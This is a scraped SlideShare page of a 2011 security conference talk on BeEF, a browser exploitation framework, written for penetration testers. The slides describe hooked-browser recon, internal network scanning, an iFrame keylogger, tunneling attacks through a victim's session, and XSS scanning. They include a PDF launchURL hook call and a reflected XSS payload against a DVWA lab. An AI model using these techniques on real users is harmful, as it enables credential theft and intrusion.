SlideShare a Scribd company logo
Ground BeEF:
Cutting, devouring and digesting
     the legs off a browser




          Michele „antisnatchor” Orru’
               6 September 2011
Who am I?
✴ Penetration Tester @ The Royal Bank of Scotland
✴ BeEF developer:
    Tunneling Proxy,
    XssRays integration,
    various exploits,
   lot of bug-fixing, testing and fun
✴ Kubrick fan
✴ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi
✴@antisnatchor
✴http://antisnatchor.com
Outline
✴ What the hell is BeEF?
✴Cutting
    Target enumeration and analysis
✴Devouring
    Internal net fingerprint
    Exploiting internal services through the hooked browser
    Keylogging, browser pwnage
✴Digesting
    Persistence, tunneling sqlmap/Burp through BeEF proxy
  XSSrays integration
✴Future development and ideas
What the hell is BeEF?
✴ BeEF: Browser Exploitation Framework
✴Pioneered by Wade Alcorn in 2005 (public release)


✴Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim
browser security-context abuse
✴Each browser is likely to be within a different security context, and each context may
provide a set of unique attack vectors.
✴ The framework allows the penetration tester to select specific modules (in real-time)
to target each browser, and therefore each context.
What the hell is BeEF?
Cutting: Target enum and
                 analysis
✴ Lot of juicy information after first hook initialization :
 ✴Browser/OS version
 ✴Cookies
 ✴Browser plugins
 ✴Supported features (Google Gears, Web Sockets, Flash, Java, . .)

✴Specific modules are also there to help
 ✴Detect links/visited URLs
 ✴Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor
 ✴Execute your custom Javascript
Cutting: Target enum and
        analysis
Devouring: Internal net fingerprint
    Recon/NetworkFingerprinting module
✴Knowing the victim internal IP, the attacker can start to fingerprint the internal
network via Javascript to find common servers and devices.
✴The approach currently in use is similar to Yokoso (InGuardians)
   ✴Map of device/application default images
   ✴img tags are loaded into the victim DOM
   ✴Onload event, if (image width/height/path == deviceImageMapEntry), then
   deviceXYZ@IP has been successfully found


✴Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... ” on Vimeo
(http://vimeo.com/24410203) for a practical example
Devouring: Internal net fingerprint
✴ Great preso „Intranet Footprinting”
    by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011)


✴ They developed new BeEF modules
✴They are working with us and their
work will be available in BeEF trunk soon.
   A few examples:
   ✴Internal DNS enumeration
   ✴Reliable Port Scanning
   ✴Ping sweep
Devouring: exploiting internal
               services
✴Network/JbossJmxUploadExploit module
✴JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have
direct access to the target (or use a host as a pivot)

✴Then why not use the victim browser as a pivot?
Devouring: persistent keylogging

    Persistence/iFrameKeylogger
 module
 ✴We can inject a 100% width/height
 overlay iFrame that loads the login
 page (in-domain), attaching a listener
 for keyboard events (keylogger) in
 JS.

✴After the victim logs in, she will
stay in the injected iFrame while the
communication channel will be
persistent in the
background.
Devouring: module autorun
✴ We’ve ported back (from the old PHP version) the autorun feature
✴Add autorun: true in the command module config.yaml that you want to autorun
✴When a new browser will be hooked in BeEF, the module will be automatically launched


✴Imagine adding autorun: true in
Metasploit autopwn module (another
feature ported back)...
Digesting: hook default browser
✴Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface”
 Browser/HookDefault module
✴We use a PDF in order to attempt hooking the default browser
✴When executed, the hooked browser will load a PDF in a new window and use that to
start the default browser.
     ✴app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true);
     ✴If everything will be ok, we hooked the default browser.

✴We are planning to improve it:
  ✴make the bounce page configurable by the user
  ✴use a ruby PDF library in order to manipulate the PDF via the web UI
Digesting: tunneling proxy
✴Having a communication channel with the hooked browser, we can:
 ✴Receive requests as a proxy on BeEF
 ✴Translate these requests to XHRs (in-domain)
 ✴Parse the XHRs responses and send the data back to the original requestor...

✴Using the victim browser hooked in BeEF as a tunneling proxy, we will see the
following scenarios:
    ✴browsing the authenticated surface of the hooked domain through the security
    context of the victim browser;
   ✴spidering the hooked domain through the security context of the victim browser;
   ✴finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim
   browser too :-) ).
Digesting: tunneling proxy




     Let see the tunneling
       proxy in action!
Digesting: XssRays
✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner
✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the
page where the browser is hooked are vulnerable to XSS.

✴What XssRays do is basically parse all the links and forms of the page where it is
loaded and check for XSS on GET, POST parameters, and also in the URI path.

✴The original code by Gareth, from 2009, used a nice trick (the location.hash fragment)
in order to have a sort of callback between parent and child iFrames
✴This is now patched by all recent browsers.
So how to check for XSSs cross-domain, respecting the SOP restrictions?
Digesting: XssRays
✴We inject a vector that will contact back BeEF if the JS code will be successfully
executed (thus, the XSS confirmed).

✴No false positives (oh yes, that’s what I like)!
✴Basically the document.location.href of the injected iFrame that contains the vector
will point to a know BeEF resource. The following is an example value of href:
✴http://192.168.84.1:3000/ui/xssrays/rays?
hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk
9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name=
%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection
%20double&method=GET


✴Next step is multihooking: hook a browser on multiple domains, to extend the attack
surface.
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Digesting: XssRays in a nutshell
Future dev and ideas

✴Improve XssRays:
 ✴add more attack vectors, more testing
 ✴add JS depth crawler
✴Multi-hooking: a browser can be hooked on multiple domains
✴Check for time-based blind SQLi cross-domain via JS
✴Improve the BeEF console (command line UI)
✴Well...take a look here: http://code.google.com/p/beef/issues/list
Get in touch with us


✴Follow the BeEF: @beefproject
✴Checkout BeEF: http://code.google.com/p/beef/
✴Check our website: http://beefproject.com
✴Have fun with it
✴We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)
Thanks to


✴Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. .
✴My colleagues Piotr & Michal
✴My employer
✴SecurityByte crew and you attendees
Questions?




Thanks for your time guys ;-)

More Related Content

PDF
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
PDF
Advances in BeEF - AthCon2012
Michele Orru
 
PDF
Buried by time, dust and BeEF
Michele Orru
 
PDF
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
PDF
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
PPTX
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
PDF
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
PDF
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 
Hacktivity2011 be ef-preso_micheleorru
Michele Orru
 
Advances in BeEF - AthCon2012
Michele Orru
 
Buried by time, dust and BeEF
Michele Orru
 
When you don't have 0days: client-side exploitation for the masses
Michele Orru
 
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome Extensions
Krzysztof Kotowicz
 
WordPress Security: Defend yourself against digital invaders
Vladimír Smitka
 
Top Ten Web Hacking Techniques (2010)
Jeremiah Grossman
 
Html5: Something wicked this way comes (Hack in Paris)
Krzysztof Kotowicz
 

What's hot (20)

PDF
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
PDF
Sandboxed platform using IFrames, postMessage and localStorage
tomasperezv
 
PDF
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
PPTX
MySQL Tips for WordPress
dsero
 
PDF
Practical Exploitation - Webappy Style
Rob Fuller
 
PDF
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
PPTX
W.E.B. 2010 - Web, Exploits, Browsers
Saumil Shah
 
PPTX
Php push notifications
Mohammed Shurrab
 
PPTX
WordPress performance tuning
Vladimír Smitka
 
PDF
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
 
PDF
I'm the butcher would you like some BeEF
Michele Orru
 
PDF
BeEF: The Browser Exploitation Framework
awiasecretary
 
ODP
Browser Exploitation Framework Tutorial
imlaurel2
 
PDF
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
PDF
HTTPS + Let's Encrypt
Walter Ebert
 
PDF
Http only cookie
fool2fish
 
PPTX
Nahlédněte za oponu VersionPressu
Jan Voracek
 
PDF
Attacker Ghost Stories - ShmooCon 2014
Rob Fuller
 
PDF
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Drivesploit: Circumventing Both Automated AND Manual Drive-By-Download Detection
Wayne Huang
 
Sandboxed platform using IFrames, postMessage and localStorage
tomasperezv
 
Rooting Your Internals: Inter-Protocol Exploitation, custom shellcode and BeEF
Michele Orru
 
MySQL Tips for WordPress
dsero
 
Practical Exploitation - Webappy Style
Rob Fuller
 
Advanced Chrome extension exploitation
Krzysztof Kotowicz
 
W.E.B. 2010 - Web, Exploits, Browsers
Saumil Shah
 
Php push notifications
Mohammed Shurrab
 
WordPress performance tuning
Vladimír Smitka
 
Attacker Ghost Stories (CarolinaCon / Area41 / RVASec)
Rob Fuller
 
I'm the butcher would you like some BeEF
Michele Orru
 
BeEF: The Browser Exploitation Framework
awiasecretary
 
Browser Exploitation Framework Tutorial
imlaurel2
 
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
HTTPS + Let's Encrypt
Walter Ebert
 
Http only cookie
fool2fish
 
Nahlédněte za oponu VersionPressu
Jan Voracek
 
Attacker Ghost Stories - ShmooCon 2014
Rob Fuller
 
Html5: something wicked this way comes - HackPra
Krzysztof Kotowicz
 
Ad

Similar to Be ef presentation-securitybyte2011-michele_orru (20)

PPT
(In)Security Implication in the JS Universe
Stefano Di Paola
 
PDF
Web Apps and more
Yan Shi
 
PDF
Web app and more
faming su
 
PPTX
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani
 
PPTX
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
PPTX
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
Building Blocks
 
PDF
Browser Horror Stories
EC-Council
 
PPTX
Bug Bounty for - Beginners
Himanshu Kumar Das
 
PDF
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
PDF
Owning bad guys {and mafia} with javascript botnets
Chema Alonso
 
PPTX
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Frédéric Harper
 
PDF
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Frédéric Harper
 
PPTX
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Frédéric Harper
 
PPTX
Java Web Security Class
Rich Helton
 
PDF
Web application penetration testing lab setup guide
Sudhanshu Chauhan
 
PPT
Sanjeev ghai 12
Praveen kumar
 
PDF
Bruce lawson-over-the-air
brucelawson
 
PDF
JSConf US 2014: Building Isomorphic Apps
Spike Brehm
 
PDF
WebAPIs & Apps - Mozilla London
Robert Nyman
 
PDF
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
(In)Security Implication in the JS Universe
Stefano Di Paola
 
Web Apps and more
Yan Shi
 
Web app and more
faming su
 
Cross Context Scripting attacks & exploitation
Roberto Suggi Liverani
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Divyanshu
 
Technical Tips: Visual Regression Testing and Environment Comparison with Bac...
Building Blocks
 
Browser Horror Stories
EC-Council
 
Bug Bounty for - Beginners
Himanshu Kumar Das
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Christian Frichot
 
Owning bad guys {and mafia} with javascript botnets
Chema Alonso
 
Firefox OS - The platform you deserve - Firefox OS Budapest workshop - 2013-1...
Frédéric Harper
 
Firefox OS, HTML5 pour le mobile - Code(love) Hackathon - 2014-05-28
Frédéric Harper
 
Firefox OS - The platform you deserve - Athens App Days - 2013-11-27
Frédéric Harper
 
Java Web Security Class
Rich Helton
 
Web application penetration testing lab setup guide
Sudhanshu Chauhan
 
Sanjeev ghai 12
Praveen kumar
 
Bruce lawson-over-the-air
brucelawson
 
JSConf US 2014: Building Isomorphic Apps
Spike Brehm
 
WebAPIs & Apps - Mozilla London
Robert Nyman
 
ZeroNights2012_BeEF_Workshop_antisnatchor
Michele Orru
 
Ad

More from Michele Orru (6)

PDF
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
PDF
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
PDF
Dark Fairytales from a Phisherman
Michele Orru
 
PDF
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
PDF
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
PDF
DeepSec2011_GroundBeEF
Michele Orru
 
Practical Phishing Automation with PhishLulz - KiwiCon X
Michele Orru
 
Dark Fairytales from a Phisherman (Vol. II)
Michele Orru
 
Dark Fairytales from a Phisherman
Michele Orru
 
Rooting your internals - Exploiting Internal Network Vulns via the Browser Us...
Michele Orru
 
BeEF_EUSecWest-2012_Michele-Orru
Michele Orru
 
DeepSec2011_GroundBeEF
Michele Orru
 

Recently uploaded (20)

PDF
SparkLabs Primer on Artificial Intelligence 2025
SparkLabs Group
 
PPTX
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
PDF
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
PDF
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
PDF
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
PDF
Doc9.....................................
SofiaCollazos
 
PDF
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
PDF
Security features in Dell, HP, and Lenovo PC systems: A research-based compar...
Principled Technologies
 
PPTX
Applied-Statistics-Mastering-Data-Driven-Decisions.pptx
parmaryashparmaryash
 
PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PDF
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
PDF
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
PDF
How-Cloud-Computing-Impacts-Businesses-in-2025-and-Beyond.pdf
Artjoker Software Development Company
 
PDF
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
PDF
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
PDF
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PPTX
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
PPTX
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
PDF
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
SparkLabs Primer on Artificial Intelligence 2025
SparkLabs Group
 
Dev Dives: Automate, test, and deploy in one place—with Unified Developer Exp...
AndreeaTom
 
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
Doc9.....................................
SofiaCollazos
 
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
Security features in Dell, HP, and Lenovo PC systems: A research-based compar...
Principled Technologies
 
Applied-Statistics-Mastering-Data-Driven-Decisions.pptx
parmaryashparmaryash
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
How-Cloud-Computing-Impacts-Businesses-in-2025-and-Beyond.pdf
Artjoker Software Development Company
 
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 

Be ef presentation-securitybyte2011-michele_orru

  • 1. Ground BeEF: Cutting, devouring and digesting the legs off a browser Michele „antisnatchor” Orru’ 6 September 2011
  • 2. Who am I? ✴ Penetration Tester @ The Royal Bank of Scotland ✴ BeEF developer: Tunneling Proxy, XssRays integration, various exploits, lot of bug-fixing, testing and fun ✴ Kubrick fan ✴ Definitely not a fan of our Italian prime minister Silvio „bunga-bunga” Berlusconi ✴@antisnatchor ✴http://antisnatchor.com
  • 3. Outline ✴ What the hell is BeEF? ✴Cutting Target enumeration and analysis ✴Devouring Internal net fingerprint Exploiting internal services through the hooked browser Keylogging, browser pwnage ✴Digesting Persistence, tunneling sqlmap/Burp through BeEF proxy XSSrays integration ✴Future development and ideas
  • 4. What the hell is BeEF? ✴ BeEF: Browser Exploitation Framework ✴Pioneered by Wade Alcorn in 2005 (public release) ✴Powerful platform for Client-side pwnage, XSS post-exploitation and generally victim browser security-context abuse ✴Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors. ✴ The framework allows the penetration tester to select specific modules (in real-time) to target each browser, and therefore each context.
  • 5. What the hell is BeEF?
  • 6. Cutting: Target enum and analysis ✴ Lot of juicy information after first hook initialization : ✴Browser/OS version ✴Cookies ✴Browser plugins ✴Supported features (Google Gears, Web Sockets, Flash, Java, . .) ✴Specific modules are also there to help ✴Detect links/visited URLs ✴Detect social networks (authenticated in Twitter, Gmail, Facebook) and Tor ✴Execute your custom Javascript
  • 7. Cutting: Target enum and analysis
  • 8. Devouring: Internal net fingerprint Recon/NetworkFingerprinting module ✴Knowing the victim internal IP, the attacker can start to fingerprint the internal network via Javascript to find common servers and devices. ✴The approach currently in use is similar to Yokoso (InGuardians) ✴Map of device/application default images ✴img tags are loaded into the victim DOM ✴Onload event, if (image width/height/path == deviceImageMapEntry), then deviceXYZ@IP has been successfully found ✴Watch „Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... ” on Vimeo (http://vimeo.com/24410203) for a practical example
  • 9. Devouring: Internal net fingerprint ✴ Great preso „Intranet Footprinting” by Javier Marcos and Juan Galiana (Owasp AppSec Eu 2011) ✴ They developed new BeEF modules ✴They are working with us and their work will be available in BeEF trunk soon. A few examples: ✴Internal DNS enumeration ✴Reliable Port Scanning ✴Ping sweep
  • 10. Devouring: exploiting internal services ✴Network/JbossJmxUploadExploit module ✴JBoss 4.x, 5.1.0, 6.0.0.M1 JMX deploy exploit is available in MSF, but you need to have direct access to the target (or use a host as a pivot) ✴Then why not use the victim browser as a pivot?
  • 11. Devouring: persistent keylogging Persistence/iFrameKeylogger module ✴We can inject a 100% width/height overlay iFrame that loads the login page (in-domain), attaching a listener for keyboard events (keylogger) in JS. ✴After the victim logs in, she will stay in the injected iFrame while the communication channel will be persistent in the background.
  • 12. Devouring: module autorun ✴ We’ve ported back (from the old PHP version) the autorun feature ✴Add autorun: true in the command module config.yaml that you want to autorun ✴When a new browser will be hooked in BeEF, the module will be automatically launched ✴Imagine adding autorun: true in Metasploit autopwn module (another feature ported back)...
  • 13. Digesting: hook default browser ✴Originally disclosed by Billy (xs-sniper) Rios on „Expanding the Attack Surface” Browser/HookDefault module ✴We use a PDF in order to attempt hooking the default browser ✴When executed, the hooked browser will load a PDF in a new window and use that to start the default browser. ✴app.launchURL("http://192.168.56.1/page-With-BeEF-Hook-Js.html",true); ✴If everything will be ok, we hooked the default browser. ✴We are planning to improve it: ✴make the bounce page configurable by the user ✴use a ruby PDF library in order to manipulate the PDF via the web UI
  • 14. Digesting: tunneling proxy ✴Having a communication channel with the hooked browser, we can: ✴Receive requests as a proxy on BeEF ✴Translate these requests to XHRs (in-domain) ✴Parse the XHRs responses and send the data back to the original requestor... ✴Using the victim browser hooked in BeEF as a tunneling proxy, we will see the following scenarios: ✴browsing the authenticated surface of the hooked domain through the security context of the victim browser; ✴spidering the hooked domain through the security context of the victim browser; ✴finding and exploiting SQLi with Burp Pro Scanner + sqlmap (through the victim browser too :-) ).
  • 15. Digesting: tunneling proxy Let see the tunneling proxy in action!
  • 16. Digesting: XssRays ✴ Originally developed by Gareth Heyes in 2009 as a pure JS-based XSS scanner ✴ The XssRays BeEF extension allows you to check if links, forms and URI paths of the page where the browser is hooked are vulnerable to XSS. ✴What XssRays do is basically parse all the links and forms of the page where it is loaded and check for XSS on GET, POST parameters, and also in the URI path. ✴The original code by Gareth, from 2009, used a nice trick (the location.hash fragment) in order to have a sort of callback between parent and child iFrames ✴This is now patched by all recent browsers. So how to check for XSSs cross-domain, respecting the SOP restrictions?
  • 17. Digesting: XssRays ✴We inject a vector that will contact back BeEF if the JS code will be successfully executed (thus, the XSS confirmed). ✴No false positives (oh yes, that’s what I like)! ✴Basically the document.location.href of the injected iFrame that contains the vector will point to a know BeEF resource. The following is an example value of href: ✴http://192.168.84.1:3000/ui/xssrays/rays? hbsess=ZdGQG32VvYmozDP3ia0mvNd5PwcjR9lXuzmTmxm1mAckrgjqA9bIfg41Si2eOfVpviNWYk 9vi2q3kvZB&raysscanid=3&poc=http://192.168.84.128/dvwa/vulnerabilities/xss_r/?name= %22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&&name=Standard%20script%20injection %20double&method=GET ✴Next step is multihooking: hook a browser on multiple domains, to extend the attack surface.
  • 18. Digesting: XssRays in a nutshell
  • 19. Digesting: XssRays in a nutshell
  • 20. Digesting: XssRays in a nutshell
  • 21. Digesting: XssRays in a nutshell
  • 22. Digesting: XssRays in a nutshell
  • 23. Digesting: XssRays in a nutshell
  • 24. Digesting: XssRays in a nutshell
  • 25. Digesting: XssRays in a nutshell
  • 26. Digesting: XssRays in a nutshell
  • 27. Digesting: XssRays in a nutshell
  • 28. Digesting: XssRays in a nutshell
  • 29. Future dev and ideas ✴Improve XssRays: ✴add more attack vectors, more testing ✴add JS depth crawler ✴Multi-hooking: a browser can be hooked on multiple domains ✴Check for time-based blind SQLi cross-domain via JS ✴Improve the BeEF console (command line UI) ✴Well...take a look here: http://code.google.com/p/beef/issues/list
  • 30. Get in touch with us ✴Follow the BeEF: @beefproject ✴Checkout BeEF: http://code.google.com/p/beef/ ✴Check our website: http://beefproject.com ✴Have fun with it ✴We’re hiring!!! (but we’ll not pay you...seriously, we have so many tasks to do, join us)
  • 31. Thanks to ✴Wade Alcorn and the other BeEF ninjas: Ben, Scotty, Christian, Brendan, Saafan,. . ✴My colleagues Piotr & Michal ✴My employer ✴SecurityByte crew and you attendees
  • 32. Questions? Thanks for your time guys ;-)